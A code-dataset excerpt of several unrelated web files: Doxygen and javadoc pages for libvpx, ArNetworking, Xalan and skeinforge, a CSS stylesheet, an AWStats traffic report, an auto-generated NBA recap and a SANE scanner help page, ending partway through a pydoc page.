path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
submodules/build-i386-apple-darwin/externals/libvpx/docs/html/readme.html | africallshop/africallshop-iphone | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.5"/>
<title>WebM VP8 Codec SDK: README</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">WebM VP8 Codec SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.5 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li class="current"><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">README </div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><pre class="fragment">vpx Multi-Format Codec SDK
README - 21 June 2012
Welcome to the WebM VP8 Codec SDK!
COMPILING THE APPLICATIONS/LIBRARIES:
The build system used is similar to autotools. Building generally consists of
"configuring" with your desired build options, then using GNU make to build
the application.
1. Prerequisites
* All x86 targets require the Yasm[1] assembler be installed.
* All Windows builds require that Cygwin[2] be installed.
* Building the documentation requires PHP[3] and Doxygen[4]. If you do not
have these packages, you must pass --disable-install-docs to the
configure script.
* Downloading the data for the unit tests requires curl[5] and sha1sum.
sha1sum is provided via the GNU coreutils, installed by default on
many *nix platforms, as well as MinGW and Cygwin. If coreutils is not
available, a compatible version of sha1sum can be built from
source[6]. These requirements are optional if not running the unit
tests.
[1]: http://www.tortall.net/projects/yasm
[2]: http://www.cygwin.com
[3]: http://php.net
[4]: http://www.doxygen.org
[5]: http://curl.haxx.se
[6]: http://www.microbrew.org/tools/md5sha1sum/
2. Out-of-tree builds
Out of tree builds are a supported method of building the application. For
an out of tree build, the source tree is kept separate from the object
files produced during compilation. For instance:
$ mkdir build
$ cd build
$ ../libvpx/configure <options>
$ make
3. Configuration options
The 'configure' script supports a number of options. The --help option can be
used to get a list of supported options:
$ ../libvpx/configure --help
4. Cross development
For cross development, the most notable option is the --target option. The
most up-to-date list of supported targets can be found at the bottom of the
--help output of the configure script. As of this writing, the list of
available targets is:
armv5te-android-gcc
armv5te-linux-rvct
armv5te-linux-gcc
armv6-darwin-gcc
armv6-linux-rvct
armv6-linux-gcc
armv7-android-gcc
armv7-linux-rvct
armv7-linux-gcc
mips32-linux-gcc
ppc32-darwin8-gcc
ppc32-darwin9-gcc
ppc64-darwin8-gcc
ppc64-darwin9-gcc
ppc64-linux-gcc
x86-darwin8-gcc
x86-darwin8-icc
x86-darwin9-gcc
x86-darwin9-icc
x86-linux-gcc
x86-linux-icc
x86-solaris-gcc
x86-win32-vs7
x86-win32-vs8
x86_64-darwin9-gcc
x86_64-linux-gcc
x86_64-solaris-gcc
x86_64-win64-vs8
universal-darwin8-gcc
universal-darwin9-gcc
generic-gnu
The generic-gnu target, in conjunction with the CROSS environment variable,
can be used to cross compile architectures that aren't explicitly listed, if
the toolchain is a cross GNU (gcc/binutils) toolchain. Other POSIX toolchains
will likely work as well. For instance, to build using the mipsel-linux-uclibc
toolchain, the following command could be used (note, POSIX SH syntax, adapt
to your shell as necessary):
$ CROSS=mipsel-linux-uclibc- ../libvpx/configure
In addition, the executables to be invoked can be overridden by specifying the
environment variables: CC, AR, LD, AS, STRIP, NM. Additional flags can be
passed to these executables with CFLAGS, LDFLAGS, and ASFLAGS.
5. Configuration errors
If the configuration step fails, the first step is to look in the error log.
This defaults to config.err. This should give a good indication of what went
wrong. If not, contact us for support.
SUPPORT
This library is an open source project supported by its community. Please
please email webm-discuss@webmproject.org for help.
</pre> </div></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Oct 13 2013 11:01:50 for WebM VP8 Codec SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.5
</small></address>
</body>
</html>
|
client/app/image-grid/image-grid.css | aviadhahami/HackIDC2016 | .isotope-container{
margin: auto;
padding: 0;
width:90%;
}
.landscape{
width: 75%!important;
}
.isotope-container ul li{
list-style: none;
}
.no-outline:focus{
outline: none;
}
.isotope-item{
min-width:20vw;
max-width: 300px;
margin: 3%;
float: left;
overflow: hidden;
color: rgba(255,255,255,0.85);
cursor: pointer;
}
.mobile-brick{
width:calc(100vw*0.8);
}
.brick-img{
height:40vw;
width:40vw;
max-height: 300px;
max-width: 300px;
border-radius: 500px;
}
.brick-link{
text-decoration: none;
}
.brick-link p {
background-color: rgba(255,255,255,0.9);
border: 1px solid white;
border-radius: 20px;
color: #607D8B;
}
.brick-hidden.ng-hide-add {
-webkit-animation:0.3s hide;
animation:0.3s hide;
}
.brick-hidden.ng-hide-remove {
-webkit-animation:0.3s show;
animation:0.3s show;
}
@keyframes show {
0% {
opacity: 0;
}
100% {
opacity: 1;
}
}
@-webkit-keyframes show {
0% {
opacity: 0;
}
100% {
opacity: 1;
}
}
@keyframes hide {
0% {
opacity: 1;
}
100% {
opacity: 0;
}
}
@-webkit-keyframes hide {
0% {
opacity: 1;
}
100% {
opacity: 0;
}
}
|
ArNetworking/docs/ArServerModeRatioDrive_8h.html | charismaticchiu/Robotics | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>ArNetworking: ArServerModeRatioDrive.h File Reference</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.4.2 -->
<div class="qindex"><a class="qindex" href="main.html">Main Page</a> | <a class="qindex" href="hierarchy.html">Class Hierarchy</a> | <a class="qindex" href="annotated.html">Class List</a> | <a class="qindex" href="files.html">File List</a> | <a class="qindex" href="functions.html">Class Members</a> | <a class="qindex" href="globals.html">File Members</a> | <a class="qindex" href="pages.html">Related Pages</a> | <a class="qindex" href="examples.html">Examples</a></div>
<h1>ArServerModeRatioDrive.h File Reference</h1>
<p>
<code>#include "ariaTypedefs.h"</code><br>
<code>#include "Aria.h"</code><br>
<code>#include "<a class="el" href="ArServerMode_8h.html">ArServerMode.h</a>"</code><br>
<table border="0" cellpadding="0" cellspacing="0">
<tr><td></td></tr>
</table>
<hr size="1"><address style="align: right;"><small>Generated on Thu Jan 7 10:34:55 2010 for ArNetworking by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.4.2 </small></address>
</body>
</html>
|
webstat/awstats.korzin.net.alldomains.052013.html | diedsmiling/busenika | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta name="generator" content="AWStats 7.1 (build 1.983) from config file awstats.korzin.net.conf (http://www.awstats.org)">
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="description" content="Awstats - Advanced Web Statistics for korzin.net (2013-05) - alldomains">
<title>Statistics for korzin.net (2013-05) - alldomains</title>
<style type="text/css">
body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; }
.aws_bodyl { }
.aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; }
.aws_title { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; }
.aws_blank { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; }
.aws_data {
background-color: #FFFFFF;
border-top-width: 1px;
border-left-width: 0px;
border-right-width: 0px;
border-bottom-width: 0px;
}
.aws_formfield { font: 13px verdana, arial, helvetica; }
.aws_button {
font-family: arial,verdana,helvetica, sans-serif;
font-size: 12px;
border: 1px solid #ccd7e0;
background-image : url(/awstatsicons/other/button.gif);
}
th { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
th.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; }
td { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
td.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;}
td.awsm { border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; }
b { font-weight: bold; }
a { font: 11px verdana, arial, helvetica, sans-serif; }
a:link { color: #0011BB; text-decoration: none; }
a:visited { color: #0011BB; text-decoration: none; }
a:hover { color: #605040; text-decoration: underline; }
.currentday { font-weight: bold; }
</style>
</head>
<body style="margin-top: 0px">
<a name="top"></a>
<a name="menu"> </a>
<form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=korzin.net&output=alldomains" style="padding: 0px 0px 0px 0px; margin-top: 0">
<table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td>
<table class="aws_data sortable" border="0" cellpadding="1" cellspacing="0" width="100%">
<tr><td class="aws" valign="middle"><b>Statistics for:</b> </td><td class="aws" valign="middle"><span style="font-size: 14px;">korzin.net</span></td><td align="right" rowspan="3"><a href="http://awstats.sourceforge.net" target="awstatshome"><img src="/awstatsicons/other/awstats_logo6.png" border="0" /></a></td></tr>
<tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b> </td><td class="aws" valign="middle"><span style="font-size: 12px;">30 Jun 2013 - 00:01</span></td></tr>
<tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month May 2013</span></td></tr>
</table>
</td></tr></table>
</form><br />
<table>
<tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr>
</table>
<a name="domains"> </a><br />
<table class="aws_border sortable" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td class="aws_title" width="70%">Visitors domains/countries </td><td class="aws_blank"> </td></tr>
<tr><td colspan="2">
<table class="aws_data" border="1" cellpadding="2" cellspacing="0" width="100%">
<tr bgcolor="#ECECEC"><th width="32"> </th><th colspan="2">Domains/Countries</th><th bgcolor="#4477DD" width="80">Pages</th><th bgcolor="#66DDEE" width="80">Hits</th><th class="datasize" bgcolor="#2EA495" width="80">Bandwidth</th><th> </th></tr>
<tr><td width="32"><img src="/awstatsicons/flags/ip.png" height="14" alt='Unknown' title='Unknown' /></td><td class="aws">Unknown</td><td>ip</td><td>16,815</td><td>305,261</td><td>4.16 GB</td><td class="aws"><img src="/awstatsicons/other/hp.png" width="15" height="5" alt='Pages: 16815' title='Pages: 16815' /><br />
<img src="/awstatsicons/other/hh.png" width="261" height="5" alt='Hits: 305261' title='Hits: 305261' /><br />
<img src="/awstatsicons/other/hk.png" width="261" height="5" alt='Bandwidth: 4.16 GB' title='Bandwidth: 4.16 GB' /></td></tr>
<tr><td width="32"> </td><td colspan="2" class="aws"><span style="color: #666688">Others</span></td><td>0</td><td>0</td><td>0</td><td class="aws"> </td></tr>
</table></td></tr></table><br />
<br /><br />
<span dir="ltr" style="font: 11px verdana, arial, helvetica; color: #000000;"><b>Advanced Web Statistics 7.1 (build 1.983)</b> - <a href="http://www.awstats.org" target="awstatshome">Created by awstats</a></span><br />
<br />
</body>
</html>
|
web/2014_season/2015040327.html | jacobbustamante/NBANLPRecap | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Marcin Gortat and Bradley Beal put up 35 in Wizards 101 to 87 win over the Knicks</title>
<link rel="stylesheet" type="text/css" href="../css/style.css">
</head>
<body>
<h1>Marcin Gortat and Bradley Beal put up 35 in Wizards 101 to 87 win over the Knicks</h1>
</br>
<h2 style="color:gray">by NBANLP Recap Generator</h2>
</br></br>
<img src="../img/27/01.jpg" alt="No image loaded" align="right" style="height:50%; width:50%;margin-left:20px;margin-bottom:20px;">
<p>The Wizards largest lead was by 22 with 1 minutes remaining in the 1st. Marcin Gortat and Bradley Beal put up a combined 35 points. Ricky Ledo played well, recording 15 points for the Knicks.</p>
<p>The Wizards held a 22 point 30-8 lead in the 1st.</p>
<p>Marcin Gortat and Bradley Beal totaled 35 points for the Wizards, putting up 19 and 16 points respectively. Gortat added 6 rebounds. Beal added 5 assists and 3 rebounds. 9 of his points were scored in the 3rd quarter.</p>
<p>Ricky put up 15 points for the Knicks in a good scoring contribution. Ledo contributed 3 assists and 9 rebounds. He put in 9 in the 2nd quarter alone.</p>
<p>The Wizards had a 17 and 0 run starting in the 1st. The Knicks gave up possession with 2 turnovers and had 6 missed attempts during that time.</p>
<p>The Wizards went on a 12 and 0 run in the 4th quarter with the Knicks giving up 0 turnovers and 10 missed attempts during that time.</p>
<p>The result puts Washington at 43-33 for the season. The Knicks are now 14-60. The Knicks haven't won in the last 9 games. The Wizards have been playing great these last few games. They've won their last 2.</p>
<p>Otto Porter, John Wall, and Drew Gooden combined for 28 points. Each scoring 13, 6, and 9 points respectively. Porter got 2 assists and 8 rebounds for the Wizards. Wall recorded 18 assists and 2 rebounds. Gooden recorded 1 assists and 13 rebounds.
Quincy Acy and Shane Larkin totaled 28 points for the Knicks, putting up 14 points each. Acy got 1 assists and 5 rebounds for the Knicks. Larkin contributed 2 assists and 5 rebounds.
Louis Amundson put in 7 points. Amundson recorded 2 assists and 10 rebounds.</p>
</body>
</html>
|
lib/xalan-j_2_7_0/docs/apidocs/org/apache/xml/dtm/ref/dom2dtm/package-use.html | MrStaticVoid/iriverter | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Sat Aug 06 17:04:44 EDT 2005 -->
<TITLE>
Xalan-Java 2.7.0: Uses of Package org.apache.xml.dtm.ref.dom2dtm
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_top"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="package-use.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
<CENTER>
<H2>
<B>Uses of Package<br>org.apache.xml.dtm.ref.dom2dtm</B></H2>
</CENTER>
No usage of org.apache.xml.dtm.ref.dom2dtm
<P>
<HR>
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_bottom"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="package-use.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
Copyright © 2005 Apache XML Project. All Rights Reserved.
</BODY>
</HTML>
|
doc/umax/sane-umax-parport-doc.html | andysan/sane-ss35p | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="Author" content="Oliver Rauch">
<meta name="Description" content="unix scanner driver for UMAX scanners">
<title>SANE-umax - UMAX parallel port scanners</title>
</head>
<body text="#000000" bgcolor="#FFFFFF" link="#0000EF" vlink="#51188E" alink="#FF0000">
<table>
<tr>
<td width=200>
<img SRC="sane-logo.jpg" alt="SANE-logo" hspace=60 align=BOTTOM>
<br>
<img SRC="sane-umax-text.jpg" alt="UMAX-logo" HSPACE=50>
</td>
<td>
<blockquote>
<h1><font color="#009900">UMAX parallel port scanners</font></h1>
</blockquote>
</td>
</tr>
</table>
<hr WIDTH="100%">
<table>
<tr>
<td VALIGN=TOP WIDTH="250" BGCOLOR="#E0E0FF">
<br>
<ul>
<li><a href="sane-umax-doc.html">Index</a></li>
<li>
Frontend options:
<ul>
<li><a href="sane-umax-standard-options-doc.html">Standard options</a></li>
<li><a href="sane-umax-advanced-options-doc.html">Advanced options</a></li>
</ul>
</li>
<li>
Supported scanners:
<ul>
<li><a href="sane-umax-powerlook-doc.html">Power Look series</a></li>
<li><a href="sane-umax-mirage-doc.html">Mirage series</a></li>
<li><a href="sane-umax-astra-doc.html">Astra series</a></li>
<li><a href="sane-umax-vista-doc.html">Vista series</a></li>
<li><a href="sane-umax-uc-doc.html">UC series</a></li>
<li><a href="sane-umax-others-doc.html">others</a></li>
<li><a href="sane-umax-not-listed-doc.html">Not listed scanners</a></li>
<li><a href="sane-umax-scanner-clones-doc.html">UMAX scanner clones</a></li>
</ul>
</li>
<li><a href="sane-umax-parport-doc.html">UMAX parallel port scanners</a></li>
<li><a href="sane-umax-config-doc.html">Configuration</a></li>
<li><a href="sane-umax-speed-doc.html">Speed of UMAX scanners</a></li>
<li><a href="http://www.rauch-domain.de/sane-umax">SANE-umax homepage</a></li>
<li><a href="http://sane-project.org">SANE homepage</a></li>
<li><a href="http://www.xsane.org/">XSane homepage</a></li>
</ul>
<br>
</td>
<td VALIGN=TOP BGCOLOR="#FFFFFF">
<blockquote>
<br>
The sane-umax library implements a <a href="http://www.sane-project.org">SANE</a>
backend that provides acces to several UMAX-SCSI-scanners.
<b>Parallel- and USB- scanners are not supported!</b>
<br>
<br>
But there is an experimental
<a href="http://umax1220p.sourceforge.net">parallel port driver for UMAX scanners</a>.
<br>
Don't ask me about that driver - I do not know anything about this driver!
</blockquote>
</td>
</tr>
</table>
<hr WIDTH="100%">
<blockquote>
Author: <a href="mailto:Oliver.Rauch@rauch-domain.de">Oliver Rauch</a>
</blockquote>
</body>
</html>
|
skein_engines/skeinforge-44/documentation/fabmetheus_utilities.geometry.geometry_tools.path.html | Pointedstick/ReplicatorG |
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: module fabmetheus_utilities.geometry.geometry_tools.path</title>
</head><body bgcolor="#f0f0f8">
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="#7799ee">
<td valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"> <br><big><big><strong><a href="fabmetheus_utilities.html"><font color="#ffffff">fabmetheus_utilities</font></a>.<a href="fabmetheus_utilities.geometry.html"><font color="#ffffff">geometry</font></a>.<a href="fabmetheus_utilities.geometry.geometry_tools.html"><font color="#ffffff">geometry_tools</font></a>.path</strong></big></big> ($Date: 2008/02/05 $)</font></td
><td align=right valign=bottom
><font color="#ffffff" face="helvetica, arial"><a href=".">index</a><br><a href="file:/home/enrique/Desktop/backup/babbleold/script/reprap/fabmetheus/fabmetheus_utilities/geometry/geometry_tools/path.py">/home/enrique/Desktop/backup/babbleold/script/reprap/fabmetheus/fabmetheus_utilities/geometry/geometry_tools/path.py</a></font></td></tr></table>
<p><tt><a href="#Path">Path</a>.</tt></p>
<p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#aa55cc">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Modules</strong></big></font></td></tr>
<tr><td bgcolor="#aa55cc"><tt> </tt></td><td> </td>
<td width="100%"><table width="100%" summary="list"><tr><td width="25%" valign=top><a href="__init__.html">__init__</a><br>
<a href="fabmetheus_utilities.geometry.geometry_tools.dictionary.html">fabmetheus_utilities.geometry.geometry_tools.dictionary</a><br>
<a href="fabmetheus_utilities.euclidean.html">fabmetheus_utilities.euclidean</a><br>
</td><td width="25%" valign=top><a href="fabmetheus_utilities.geometry.geometry_utilities.evaluate.html">fabmetheus_utilities.geometry.geometry_utilities.evaluate</a><br>
<a href="fabmetheus_utilities.geometry.geometry_utilities.matrix.html">fabmetheus_utilities.geometry.geometry_utilities.matrix</a><br>
<a href="fabmetheus_utilities.geometry.geometry_utilities.evaluate_elements.setting.html">fabmetheus_utilities.geometry.geometry_utilities.evaluate_elements.setting</a><br>
</td><td width="25%" valign=top><a href="fabmetheus_utilities.svg_writer.html">fabmetheus_utilities.svg_writer</a><br>
<a href="fabmetheus_utilities.geometry.geometry_tools.vertex.html">fabmetheus_utilities.geometry.geometry_tools.vertex</a><br>
<a href="fabmetheus_utilities.xml_simple_reader.html">fabmetheus_utilities.xml_simple_reader</a><br>
</td><td width="25%" valign=top><a href="fabmetheus_utilities.xml_simple_writer.html">fabmetheus_utilities.xml_simple_writer</a><br>
</td></tr></table></td></tr></table><p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#ee77aa">
<td colspan=3 valign=bottom> <br>
<font color="#ffffff" face="helvetica, arial"><big><strong>Classes</strong></big></font></td></tr>
<tr><td bgcolor="#ee77aa"><tt> </tt></td><td> </td>
<td width="100%"><dl>
<dt><font face="helvetica, arial"><a href="fabmetheus_utilities.geometry.geometry_tools.dictionary.html#Dictionary">fabmetheus_utilities.geometry.geometry_tools.dictionary.Dictionary</a>
</font></dt><dd>
<dl>
<dt><font face="helvetica, arial"><a href="fabmetheus_utilities.geometry.geometry_tools.path.html#Path">Path</a>
</font></dt></dl>
</dd>
<dt><font face="helvetica, arial"><a href="fabmetheus_utilities.geometry.geometry_tools.path.html#SVGFabricationCarving">SVGFabricationCarving</a>
</font></dt></dl>
<p>
<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="#ffc8d8">
<td colspan=3 valign=bottom> <br>
<font color="#000000" face="helvetica, arial"><a name="Path">class <strong>Path</strong></a>(<a href="fabmetheus_utilities.geometry.geometry_tools.dictionary.html#Dictionary">fabmetheus_utilities.geometry.geometry_tools.dictionary.Dictionary</a>)</font></td></tr>
<tr bgcolor="#ffc8d8"><td rowspan=2><tt> </tt></td>
<td colspan=2><tt>A path.<br> </tt></td></tr>
<tr><td> </td>
<td width="100%">Methods defined here:<br>
<dl><dt><a name="Path-__init__"><strong>__init__</strong></a>(self)</dt><dd><tt>Add empty lists.</tt></dd></dl>
<dl><dt><a name="Path-addXMLInnerSection"><strong>addXMLInnerSection</strong></a>(self, depth, output)</dt><dd><tt>Add the xml section for this object.</tt></dd></dl>
<dl><dt><a name="Path-getFabricationExtension"><strong>getFabricationExtension</strong></a>(self)</dt><dd><tt>Get fabrication extension.</tt></dd></dl>
<dl><dt><a name="Path-getFabricationText"><strong>getFabricationText</strong></a>(self, addLayerTemplate)</dt><dd><tt>Get fabrication text.</tt></dd></dl>
<dl><dt><a name="Path-getMatrix4X4"><strong>getMatrix4X4</strong></a>(self)</dt><dd><tt>Get the matrix4X4.</tt></dd></dl>
<dl><dt><a name="Path-getMatrixChainTetragrid"><strong>getMatrixChainTetragrid</strong></a>(self)</dt><dd><tt>Get the matrix chain tetragrid.</tt></dd></dl>
<dl><dt><a name="Path-getPaths"><strong>getPaths</strong></a>(self)</dt><dd><tt>Get all paths.</tt></dd></dl>
<dl><dt><a name="Path-getTransformedPaths"><strong>getTransformedPaths</strong></a>(self)</dt><dd><tt>Get all transformed paths.</tt></dd></dl>
<hr>
Methods inherited from <a href="fabmetheus_utilities.geometry.geometry_tools.dictionary.html#Dictionary">fabmetheus_utilities.geometry.geometry_tools.dictionary.Dictionary</a>:<br>
<dl><dt><a name="Path-__repr__"><strong>__repr__</strong></a>(self)</dt><dd><tt>Get the string representation of this object info.</tt></dd></dl>
<dl><dt><a name="Path-addXML"><strong>addXML</strong></a>(self, depth, output)</dt><dd><tt>Add xml for this object.</tt></dd></dl>
<dl><dt><a name="Path-addXMLArchivableObjects"><strong>addXMLArchivableObjects</strong></a>(self, depth, output)</dt><dd><tt>Add xml for this object.</tt></dd></dl>
<dl><dt><a name="Path-createShape"><strong>createShape</strong></a>(self)</dt><dd><tt>Create the shape.</tt></dd></dl>
<dl><dt><a name="Path-getAttributes"><strong>getAttributes</strong></a>(self)</dt><dd><tt>Get attribute table.</tt></dd></dl>
<dl><dt><a name="Path-getComplexTransformedPathLists"><strong>getComplexTransformedPathLists</strong></a>(self)</dt><dd><tt>Get complex transformed path lists.</tt></dd></dl>
<dl><dt><a name="Path-getGeometryOutput"><strong>getGeometryOutput</strong></a>(self)</dt><dd><tt>Get geometry output dictionary.</tt></dd></dl>
<dl><dt><a name="Path-getMinimumZ"><strong>getMinimumZ</strong></a>(self)</dt><dd><tt>Get the minimum z.</tt></dd></dl>
